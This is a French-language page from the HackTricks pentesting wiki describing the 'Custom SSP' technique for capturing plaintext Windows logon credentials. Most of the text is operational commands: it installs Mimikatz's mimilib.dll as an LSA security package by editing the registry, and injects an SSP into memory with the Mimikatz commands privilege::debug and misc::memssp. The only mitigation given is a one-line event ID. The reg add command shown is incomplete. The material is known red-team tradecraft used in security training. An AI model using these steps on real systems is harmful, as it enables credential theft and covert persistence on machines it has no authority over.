Custom SSP

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.

SSP personnalisé

Apprenez ce qu'est un SSP (Security Support Provider) ici. Vous pouvez créer votre propre SSP pour capturer en clair les informations d'identification utilisées pour accéder à la machine.

Mimilib

Vous pouvez utiliser le binaire mimilib.dll fourni par Mimikatz. Cela enregistrera dans un fichier toutes les informations d'identification en clair. Déposez le dll dans C:\Windows\System32\ Obtenez une liste des packages de sécurité LSA existants :

attaquant@cible

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Ajoutez mimilib.dll à la liste des fournisseurs de support de sécurité (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Et après un redémarrage, toutes les informations d'identification peuvent être trouvées en clair dans C:\Windows\System32\kiwissp.log

En mémoire

Vous pouvez également injecter ceci en mémoire directement en utilisant Mimikatz (notez que cela pourrait être un peu instable/ne pas fonctionner):

privilege::debug
misc::memssp

Cela ne survivra pas aux redémarrages.

Atténuation

ID d'événement 4657 - Audit de la création/modification de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

PreviousConstrained Delegation NextDCShadow

Last updated 9 months ago